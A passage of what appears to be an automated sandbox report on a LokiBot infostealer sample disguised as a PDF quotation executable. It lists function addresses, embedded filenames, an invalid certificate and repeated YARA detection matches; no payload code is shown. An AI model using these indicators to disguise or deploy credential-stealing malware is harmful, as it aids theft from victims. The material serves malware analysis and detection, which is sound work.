                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A73A909_2_00A73A90
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A75BE09_2_00A75BE0
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A713EC9_2_00A713EC
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A75BD09_2_00A75BD0
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A7A5A59_2_00A7A5A5
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A75DC89_2_00A75DC8
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A735189_2_00A73518
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A795479_2_00A79547
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A756E09_2_00A756E0
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A756D09_2_00A756D0
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A717289_2_00A71728
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_023FC3249_2_023FC324
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_023FD3879_2_023FD387
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_023F14789_2_023F1478
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_023FB2089_2_023FB208
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_023FB2039_2_023FB203
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_023F91EC9_2_023F91EC
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_023F14699_2_023F1469
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_04A922389_2_04A92238
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_04A92DEF9_2_04A92DEF
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_08F338E89_2_08F338E8
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_08F307309_2_08F30730
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_08F338D99_2_08F338D9
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_08F3D8189_2_08F3D818
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_08F3BB909_2_08F3BB90
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_08F3CE309_2_08F3CE30
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_08F3B3209_2_08F3B320
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_08F304489_2_08F30448
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_08F304289_2_08F30428
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_08F3B7589_2_08F3B758
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_08F307209_2_08F30720
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 13_2_0040549C13_2_0040549C
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 13_2_004029D413_2_004029D4
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: String function: 0041219C appears 45 times
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: String function: 00405B6F appears 42 times
                    Source: Quotation2025-0107pdf.exeStatic PE information: invalid certificate
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720797556.0000000009A00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs Quotation2025-0107pdf.exe
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1714510226.0000000004AC6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs Quotation2025-0107pdf.exe
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1724388342.000000000D390000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Quotation2025-0107pdf.exe
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1710408337.00000000012AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Quotation2025-0107pdf.exe
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs Quotation2025-0107pdf.exe
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Quotation2025-0107pdf.exe
                    Source: Quotation2025-0107pdf.exe, 00000000.00000000.1651290474.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTbSC.exe: vs Quotation2025-0107pdf.exe
                    Source: Quotation2025-0107pdf.exeBinary or memory string: OriginalFilenameTbSC.exe: vs Quotation2025-0107pdf.exe
                    Source: Quotation2025-0107pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 9.2.mexnJkivovwH.exe.3ebf078.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 9.2.mexnJkivovwH.exe.3ebf078.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 9.2.mexnJkivovwH.exe.3ebf078.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 9.2.mexnJkivovwH.exe.3ebf078.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 9.2.mexnJkivovwH.exe.3c45590.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 9.2.mexnJkivovwH.exe.3c45590.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 9.2.mexnJkivovwH.exe.3c45590.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 9.2.mexnJkivovwH.exe.3c45590.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
